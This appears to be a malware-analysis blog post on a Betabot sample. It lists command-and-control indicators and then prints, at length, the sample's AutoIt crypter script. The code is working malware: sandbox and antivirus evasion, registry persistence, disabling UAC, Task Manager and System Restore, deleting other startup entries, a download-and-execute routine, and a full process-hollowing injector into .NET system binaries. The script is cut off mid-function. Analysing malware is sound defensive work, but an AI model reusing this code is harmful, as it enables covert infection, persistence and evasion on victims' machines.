Resolved boot.sx to 109.236.80.74
Server: boot.sx
Gate file: /g4sg/order.php
Alternate domain:
illuminati.sx
This betabot is quite interesting due to the bizarre crypter it uses. The crypter starts with a Winrar SFX archive. This dumps it’s contents in the users temp folder and starts the next layer, a vbs script. The vbs script runs a AutoIT script using a bundled AutoIT interpreter which then decrypts the betabot binary and injects it into a .NET system file. The AutoIt script seems to have many function beyond the simple injection so I’ve included it below.
Hosting info: http://whois.domaintools.com/109.236.80.74
Related md5s (Download samples from Malwr.com)
Betabot: c134f10b6e30aa740c2151dad1c3700d
AutoIt Script
#NoTrayIcon
If ProcessExists("avastui.exe") Then Sleep(20000)
$path = "bgfau"
$uniscriptdir = FileGetShortName(@ScriptDir)
$uniscriptfullpath = FileGetShortName(@ScriptFullPath)
$unicode_startup = FileGetShortName(@StartupDir)
$unicode_windows = FileGetShortName(@WindowsDir)
$unicode_system = FileGetShortName(@SystemDir)
$unicode_temp = FileGetShortName(@TempDir)
$win_userprofile = "%temp%"
FileSetAttrib($uniscriptdir, "+SHR")
Local $delay = IniRead($uniscriptdir & "PInjcjRe.CGN", "delay1", "delay2", "NotFound")
If $delay = "delay3" Then
delay()
Else
EndIf
Local $mutex = IniRead($uniscriptdir & "PInjcjRe.CGN", "mutex1", "mutex2", "NotFound")
If $mutex = "mutex3" Then
mutex()
Else
EndIf
Local $startup = IniRead($uniscriptdir & "PInjcjRe.CGN", "start1", "start2", "NotFound")
If $startup = "start3" Then
startup()
Else
EndIf
Local $antis = IniRead($uniscriptdir & "PInjcjRe.CGN", "antis1", "antis2", "NotFound")
If $antis = "antis3" Then
antis()
Else
EndIf
Local $fake = IniRead($uniscriptdir & "PInjcjRe.CGN", "fake1", "fake2", "NotFound")
If $fake = "fake3" Then
fakemessage()
Else
EndIf
Local $botkiller = IniRead($uniscriptdir & "PInjcjRe.CGN", "botkiller1", "botkiller2", "NotFound")
If $botkiller = "botkiller3" Then
botkiller()
Else
EndIf
Local $downloader = IniRead($uniscriptdir & "PInjcjRe.CGN", "downloader1", "downloader2", "NotFound")
If $downloader = "downloader3" Then
downloader()
Else
EndIf
Local $uac = IniRead($uniscriptdir & "PInjcjRe.CGN", "uac1", "uac2", "NotFound")
If $uac = "uac3" Then
disable_uac()
Else
EndIf
Local $systemrestore = IniRead($uniscriptdir & "PInjcjRe.CGN", "systemrestore1", "systemrestore2", "NotFound")
If $systemrestore = "systemrestore3" Then
disable_syste_restore()
Else
EndIf
Local $antitask = IniRead($uniscriptdir & "PInjcjRe.CGN", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
antitask()
Else
EndIf
Func delay()
$counter = 0
While $counter <= 5
Sleep(5000)
ShellExecute(@SystemDir & "mshta.exe")
$counter = $counter + 1
_rundos("taskkill /IM mshta.exe")
WEnd
EndFunc
Func systemhide()
RegWrite("HKCU64SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoFolderOptions", "REG_DWORD", 1)
RegWrite("HKCU64SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced", "ShowSuperHidden", "REG_DWORD", 0)
EndFunc
Func fakemessage()
$type = IniRead($uniscriptdir & "PInjcjRe.CGN", "messagetype1", "messagetype2", "NotFound")
$title = IniRead($uniscriptdir & "PInjcjRe.CGN", "messagetitle1", "messagetitle2", "NotFound")
$message = IniRead($uniscriptdir & "PInjcjRe.CGN", "messagetext1", "messagetext2", "NotFound")
If FileExists($unicode_temp & "" & $path & "check.txt") Then
Else
MsgBox($type, $title, $message)
FileWrite($unicode_temp & "" & $path & "check.txt", "")
EndIf
EndFunc
Func mutex()
$scriptname = "adSR.NDlzD"
If UBound(ProcessList($scriptname)) > 2 Then Exit
EndFunc
Func antitask()
$read_antitask = RegRead("HKCU64SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem", "DisableTaskMgr")
If NOT ($read_antitask = "1") Then
RegWrite("HKCU64SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem", "DisableTaskMgr", "REG_DWORD", "1")
EndIf
EndFunc
Func disable_uac()
$read_uac = RegRead("HKLM64SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem", "EnableLUA")
If NOT ($read_uac = "0") Then
RegWrite("HKLM64SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem", "EnableLUA", "REG_DWORD", "0")
EndIf
EndFunc
Func startup()
$buac = _checkelevationenabled()
If $buac = 0 Then
Else
FileCreateShortcut($unicode_temp & "" & $path & "53965.vbs", $unicode_startup & "start.lnk")
FileSetAttrib($unicode_startup & "start.lnk", "+SH")
EndIf
RegWrite("HKCU64SoftwareMicrosoftWindowsCurrentVersionRunOnce", $path, "REG_SZ", $unicode_temp & "" & $path & "53965.vbs")
If NOT FileExists($unicode_temp & "" & $path & "53965.vbs") Then
Local $bat = FileOpen($unicode_temp & "" & $path & "88684.cmd", 1)
$autoit3 = "adSR.NDlzD"
FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "" & @CRLF & "start " & $autoit3 & " " & '"' & @ScriptName & '"')
FileClose($bat)
Local $vbs = FileOpen($unicode_temp & "" & $path & "53965.vbs", 1)
FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="""' & $unicode_temp & "" & $path & "" & '88684.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit")
FileClose($vbs)
RegWrite("HKCU64SoftwareMicrosoftWindowsCurrentVersionRunOnce", $path, "REG_SZ", $unicode_temp & "" & $path & "53965.vbs")
FileSetAttrib($unicode_temp & "" & $path & "53965.vbs", "+SHR")
FileSetAttrib($unicode_temp & "" & $path & "88684.cmd", "+SHR")
If FileExists($unicode_startup & "start.lnk") Then
FileDelete($unicode_startup & "start.lnk")
EndIf
Else
EndIf
EndFunc
Func _checkelevationenabled()
$read_uac = RegRead("HKLM64SOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem", "EnableLUA")
If @error Then Return
Local $struct = DllStructCreate("BOOL")
Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct))
If @error Then
Return SetError(@error)
EndIf
Return SetError($artn[0], 0, DllStructGetData($struct, 1))
EndFunc
Func antis()
If WinGetText("Program Manager") = "0" Then
Exit
Else
EndIf
If ProcessExists("VboxService.exe") Then
Exit
EndIf
If ProcessExists("VMwaretray.exe") Then
Exit
EndIf
EndFunc
Func persistence()
If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
$pathtovbs = ($uniscriptdir & "" & "CvYZcYvw.vbs")
ShellExecute($pathtovbs)
Exit
EndIf
EndFunc
Func downloader()
If FileExists($unicode_temp & "" & $path & "dl.txt") Then
Else
FileWrite($unicode_temp & "" & $path & "dl.txt", "")
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hdownload = InetGet("replace-me-url", $unicode_temp & "" & $random_download_name, 1, 1)
Do
Sleep(250)
Until InetGetInfo($hdownload, 2)
Local $nbytes = InetGetInfo($hdownload, 0)
InetClose($hdownload)
ShellExecute($unicode_temp & "" & $random_download_name)
EndIf
EndFunc
Func bsod()
$a = ProcessList()
For $i = 1 To UBound($a) - 1
ProcessClose($a[$i][0])
Next
Exit
EndFunc
Func botkiller()
RegDelete("HKCU64SOFTWAREMicrosoftWindowsCurrentVersionRun")
RegWrite("HKCU64SOFTWAREMicrosoftWindowsCurrentVersionRun")
RegDelete("HKLM64SOFTWAREMicrosoftWindowsCurrentVersionRun")
RegWrite("HKLM64SOFTWAREMicrosoftWindowsCurrentVersionRun")
FileDelete(@StartupDir & "*.*")
EndFunc
Func disable_syste_restore()
If FileExists($uniscriptdir & "check.txt") Then
Else
RegDelete("HKLM64SoftwareMicrosoftWindows NTCurrentVersionSPPClients")
FileWrite($uniscriptdir & "check.txt", "")
EndIf
EndFunc
Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc
Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]
Func _crypt_encryptdata($vdata, $vcryptkey, $ialg_id, $ffinal = True)
Local $hbuff
Local $ierror
Local $vreturn
Local $reqbuffsize
Local $aret
_crypt_startup()
Do
If $ialg_id <> $calg_userkey Then
$vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
If @error Then
$ierror = 1
$vreturn = -1
ExitLoop
EndIf
EndIf
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "ptr", 0, "dword*", BinaryLen($vdata), "dword", 0)
If @error OR NOT $aret[0] Then
$ierror = 2
$vreturn = -1
ExitLoop
EndIf
$reqbuffsize = $aret[6]
$hbuff = DllStructCreate("byte[" & $reqbuffsize & "]")
DllStructSetData($hbuff, 1, $vdata)
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata), "dword", DllStructGetSize($hbuff))
If @error OR NOT $aret[0] Then
$ierror = 3
$vreturn = -1
ExitLoop
EndIf
$ierror = 0
$vreturn = DllStructGetData($hbuff, 1)
Until True
Return $vreturn
EndFunc
Func _crypt_decryptdata($vdata, $vcryptkey, $ialg_id, $ffinal = True)
Local $hbuff
Local $ierror
Local $vreturn
Local $htempstruct
Local $iplaintextsize
Local $aret
_crypt_startup()
Do
If $ialg_id <> $calg_userkey Then
$vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id)
If @error Then
$ierror = 1
$vreturn = -1
ExitLoop
EndIf
EndIf
$hbuff = DllStructCreate("byte[" & BinaryLen($vdata) + 1000 & "]")
DllStructSetData($hbuff, 1, $vdata)
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptDecrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata))
If @error OR NOT $aret[0] Then
$ierror = 2
$vreturn = -1
ExitLoop
EndIf
$iplaintextsize = $aret[6]
$htempstruct = DllStructCreate("byte[" & $iplaintextsize & "]", DllStructGetPtr($hbuff))
$ierror = 0
$vreturn = DllStructGetData($htempstruct, 1)
Until True
Return $vreturn
EndFunc
Func _crypt_startup()
If __crypt_refcount() = 0 Then
Local $hadvapi32 = DllOpen("Advapi32.dll")
If @error Then Return SetError(1, 0, False)
__crypt_dllhandleset($hadvapi32)
Local $aret
Local $iproviderid = $prov_rsa_aes
If @OSVersion = "WIN_2000" Then $iproviderid = $prov_rsa_full
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iproviderid, "dword", $crypt_verifycontext)
If @error OR NOT $aret[0] Then
DllClose(__crypt_dllhandle())
Return SetError(2, 0, False)
Else
__crypt_contextset($aret[1])
EndIf
EndIf
__crypt_refcountinc()
Return True
EndFunc
Func _crypt_derivekey($vpassword, $ialg_id, $ihash_alg_id = $calg_md5)
Local $aret
Local $hcrypthash
Local $hbuff
Local $ierror
Local $vreturn
_crypt_startup()
Do
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ihash_alg_id, "ptr", 0, "dword", 0, "handle*", 0)
If @error OR NOT $aret[0] Then
$ierror = 1
$vreturn = -1
ExitLoop
EndIf
$hcrypthash = $aret[5]
$hbuff = DllStructCreate("byte[" & BinaryLen($vpassword) & "]")
DllStructSetData($hbuff, 1, $vpassword)
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $hbuff, "dword", DllStructGetSize($hbuff), "dword", $crypt_userdata)
If @error OR NOT $aret[0] Then
$ierror = 2
$vreturn = -1
ExitLoop
EndIf
$aret = DllCall(__crypt_dllhandle(), "bool", "CryptDeriveKey", "handle", __crypt_context(), "uint", $ialg_id, "handle", $hcrypthash, "dword", $crypt_exportable, "handle*", 0)
If @error OR NOT $aret[0] Then
$ierror = 3
$vreturn = -1
ExitLoop
EndIf
$ierror = 0
$vreturn = $aret[5]
Until True
If $hcrypthash <> 0 Then DllCall(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash)
Return SetError($ierror, 0, $vreturn)
EndFunc
Func __crypt_contextset($hcryptcontext)
$__g_acryptinternaldata[2] = $hcryptcontext
EndFunc
Func __crypt_context()
Return $__g_acryptinternaldata[2]
EndFunc
Func __crypt_dllhandleset($hadvapi32)
$__g_acryptinternaldata[1] = $hadvapi32
EndFunc
Func __crypt_dllhandle()
Return $__g_acryptinternaldata[1]
EndFunc
Func __crypt_refcountdec()
If $__g_acryptinternaldata[0] > 0 Then $__g_acryptinternaldata[0] -= 1
EndFunc
Func __crypt_refcountinc()
$__g_acryptinternaldata[0] += 1
EndFunc
Func __crypt_refcount()
Return $__g_acryptinternaldata[0]
EndFunc
submain()
Func submain()
$skey = IniRead($uniscriptdir & "PInjcjRe.CGN", "4828224", "4828224", "NotFound")
$sapppath1 = FileGetShortName(@ScriptDir & "EeMiIjNOJxW.OEA")
$sapppath = FileRead(FileOpen($sapppath1, 16))
$sarquive = _crypt_decryptdata($sapppath, $skey, $calg_rc2)
_runpe($sarquive)
EndFunc
Func info($getfiledata, $stringtoget)
Return StringTrimLeft($getfiledata, StringInStr($getfiledata, $stringtoget) - 1 + StringLen($stringtoget))
EndFunc
Func _runpe($bbinaryimage, $scommandline = "")
#Region 1. DETERMINE INTERPRETER TYPE
Local $fautoitx64 = @AutoItX64
#Region 2. PREDPROCESSING PASSED
Local $bbinary = Binary($bbinaryimage)
Local $tbinary = DllStructCreate("BYTE[" & BinaryLen($bbinary) & "]")
DllStructSetData($tbinary, 1, $bbinary)
Local $ppointer = DllStructGetPtr($tbinary)
#Region 3. CREATING NEW PROCESS
$inject_net2_regsvc = ($unicode_windows & "Microsoft.NETFrameworkv2.0.50727RegSvcs.exe")
$inject_net4_regsvc = ($unicode_windows & "Microsoft.NETFrameworkv4.0.30319RegSvcs.exe")
$inject_net2_regasm = ($unicode_windows & "Microsoft.NETFrameworkv2.0.50727RegAsm.exe")
$inject_net4_regasm = ($unicode_windows & "Microsoft.NETFrameworkv4.0.30319RegAsm.exe")
$inject_net2_applaunch = ($unicode_windows & "Microsoft.NETFrameworkv2.0.50727AppLaunch.exe")
$inject_net4_applaunch = ($unicode_windows & "Microsoft.NETFrameworkv4.0.30319AppLaunch.exe")
$inject_newdev = ($unicode_system & "newdev.exe")
$inject_twunk_32 = ($unicode_windows & "twunk_32.exe")
$inject_ndadmin = ($unicode_system & "ndadmin.exe")
If FileExists($inject_net4_regsvc) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_regsvc, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net2_regsvc) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_regsvc, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net4_regasm) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_regasm, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net2_regasm) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_regasm, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net4_applaunch) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_applaunch, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_net2_applaunch) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_applaunch, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_newdev) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_newdev, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
ElseIf FileExists($inject_twunk_32) Then
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_twunk_32, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
Else
Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_ndadmin, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
EndIf
If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
Local $hprocess = DllStructGetData($tprocess_information, "PROCESS")
Local $hthread = DllStructGetData($tprocess_information, "THREAD")
If $fautoitx64 AND __runpe_iswow64process($hprocess) Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(2, 0, 0)
EndIf
#Region 4. FILL CONTEXT STRUCTURE
Local $irunflag, $tcontext
If $fautoitx64 Then
If @OSArch = "X64" Then
$irunflag = 2
Else
$irunflag = 3
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(102, 0, 0)
EndIf
Else
$irunflag = 1
EndIf
Local $context_full
Switch $irunflag
Case 1
$context_full = 65543
Case 2
$context_full = 1048583
Case 3
$context_full = 524327
EndSwitch
DllStructSetData($tcontext, "CONTEXTFLAGS", $context_full)
$acall = DllCall("KERNEL32.DLL", "BOOL", "GetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(3, 0, 0)
EndIf
Local $ppeb
Switch $irunflag
Case 1
$ppeb = DllStructGetData($tcontext, "EBX")
Case 2
$ppeb = DllStructGetData($tcontext, "RDX")
Case 3
EndSwitch
#Region 5. READ PE-FORMAT
Local $pheaders_new = $ppointer
$ppointer += DllStructGetData($timage_dos_header, "ADDRESSOFNEWEXEHEADER")
Local $smagic = DllStructGetData($timage_dos_header, "MAGIC")
If NOT ($smagic == "MZ") Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(4, 0, 0)
EndIf
Local $timage_nt_signature = DllStructCreate("DWORD SIGNATURE", $ppointer)
$ppointer += 4
If DllStructGetData($timage_nt_signature, "SIGNATURE") <> 17744 Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(5, 0, 0)
EndIf
Local $inumberofsections = DllStructGetData($timage_file_header, "NUMBEROFSECTIONS")
$ppointer += 20
Local $imagic = DllStructGetData($tmagic, 1)
Local $timage_optional_header
If $imagic = 267 Then
If $fautoitx64 Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(6, 0, 0)
EndIf
$ppointer += 96
ElseIf $imagic = 523 Then
If NOT $fautoitx64 Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(6, 0, 0)
EndIf
$ppointer += 112
Else
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(6, 0, 0)
EndIf
Local $ientrypointnew = DllStructGetData($timage_optional_header, "ADDRESSOFENTRYPOINT")
Local $ioptionalheadersizeofheadersnew = DllStructGetData($timage_optional_header, "SIZEOFHEADERS")
Local $poptionalheaderimagebasenew = DllStructGetData($timage_optional_header, "IMAGEBASE")
Local $ioptionalheadersizeofimagenew = DllStructGetData($timage_optional_header, "SIZEOFIMAGE")
$ppointer += 8
$ppointer += 8
$ppointer += 24
Local $paddressnewbasereloc = DllStructGetData($timage_directory_entry_basereloc, "VIRTUALADDRESS")
Local $isizebasereloc = DllStructGetData($timage_directory_entry_basereloc, "SIZE")
Local $frelocatable
If $paddressnewbasereloc AND $isizebasereloc Then $frelocatable = True
If NOT $frelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF)
$ppointer += 88
#Region 6. ALLOCATE 'NEW' MEMORY SPACE
Local $frelocate
Local $pzeropoint
If $frelocatable Then
$pzeropoint = __runpe_allocateexespace($hprocess, $ioptionalheadersizeofimagenew)
If @error Then
$pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
__runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
$pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(101, 1, 0)
EndIf
EndIf
EndIf
$frelocate = True
Else
$pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
__runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
$pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
If @error Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(101, 0, 0)
EndIf
EndIf
EndIf
DllStructSetData($timage_optional_header, "IMAGEBASE", $pzeropoint)
#Region 7. CONSTRUCT THE NEW MODULE
Local $tmodule = DllStructCreate("BYTE[" & $ioptionalheadersizeofimagenew & "]")
Local $pmodule = DllStructGetPtr($tmodule)
Local $theaders = DllStructCreate("BYTE[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new)
DllStructSetData($tmodule, 1, DllStructGetData($theaders, 1))
Local $timage_section_header
Local $isizeofrawdata, $ppointertorawdata
Local $ivirtualaddress, $ivirtualsize
Local $trelocraw
For $i = 1 To $inumberofsections
$isizeofrawdata = DllStructGetData($timage_section_header, "SIZEOFRAWDATA")
$ppointertorawdata = $pheaders_new + DllStructGetData($timage_section_header, "POINTERTORAWDATA")
$ivirtualaddress = DllStructGetData($timage_section_header, "VIRTUALADDRESS")
$ivirtualsize = DllStructGetData($timage_section_header, "UNIONOFVIRTUALSIZEANDPHYSICALADDRESS")
If $ivirtualsize AND $ivirtualsize < $isizeofrawdata Then $isizeofrawdata = $ivirtualsize
If $isizeofrawdata Then
DllStructSetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, DllStructGetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $ppointertorawdata), 1))
EndIf
If $frelocate Then
If $ivirtualaddress <= $paddressnewbasereloc AND $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc Then
$trelocraw = DllStructCreate("BYTE[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress))
EndIf
EndIf
$ppointer += 40
Next
If $frelocate Then __runpe_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523)
$acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $pzeropoint, "PTR", $pmodule, "DWORD_PTR", $ioptionalheadersizeofimagenew, "DWORD_PTR*", 0)
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(7, 0, 0)
EndIf
#Region 8. PEB IMAGEBASEADDRESS MANIPULATION
$acall = DllCall("KERNEL32.DLL", "BOOL", "ReadProcessMemory", "PTR", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(8, 0, 0)
EndIf
DllStructSetData($tpeb, "IMAGEBASEADDRESS", $pzeropoint)
$acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(9, 0, 0)
EndIf
#Region 9. NEW ENTRY POINT
Switch $irunflag
Case 1
DllStructSetData($tcontext, "EAX", $pzeropoint + $ientrypointnew)
Case 2
DllStructSetData($tcontext, "RCX", $pzeropoint + $ientrypointnew)
Case 3
EndSwitch
#Region 10. SET NEW CONTEXT
$acall = DllCall("KERNEL32.DLL", "BOOL", "SetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
If @error OR NOT $acall[0] Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(10, 0, 0)
EndIf
#Region 11. RESUME THREAD
$acall = DllCall("KERNEL32.DLL", "DWORD", "ResumeThread", "HANDLE", $hthread)
If @error OR $acall[0] = -1 Then
DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
Return SetError(11, 0, 0)
EndIf
#Region 12. CLOSE OPEN HANDLES AND RETURN PID
DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hprocess)
DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hthread)
Return DllStructGetData($tprocess_information, "PROCESSID")
EndFunc
Func __runpe_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64)
Local $idelta = $paddressnew - $paddressold
Local $isize = DllStructGetSize($tdata)
Local $pdata = DllStructGetPtr($tdata)
Local $timage_base_relocation, $irelativemove
Local $ivirtualaddress, $isizeofblock, $inumberofentries
Local $tenries, $idata, $taddress
Local $iflag = 3 + 7 * $fimagex64
While $irelativemove < $isize
$ivirtualaddress = DllStructGetData($timage_base_relocation, "VIRTUALADDRESS")
$isizeofblock = DllStructGetData($timage_base_relocation, "SIZEOFBLOCK")
$inumberofentries = ($isizeofblock - 8) / 2
$tenries = DllStructCreate("WORD[" & $inumberofentries & "]", DllStructGetPtr($timage_base_relocation) + 8)
For $i = 1 To $inumberofentries
$idata = DllStructGetData($tenries, 1, $i)
If BitShift($idata, 12) = $iflag Then
$taddress = DllStructCreate("PTR", $pmodule + $ivirtualaddress + BitAND($idata, 4095))
DllStructSetData($taddress, 1, DllStructGetData($taddress, 1) + $idelta)
EndIf
Next
$irelativemove += $isizeofblock
WEnd
Return 1
EndFunc
Func __runpe_allocateexespaceataddress($hprocess, $paddress, $isize)
Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 4096, "DWORD", 64)
If @error OR NOT $acall[0] Then
$acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
If @error OR NOT $acall[0] Then Return SetError(1, 0, 0)
EndIf
Return $acall[0]
EndFunc
Func __runpe_allocateexespace($hprocess, $isize)
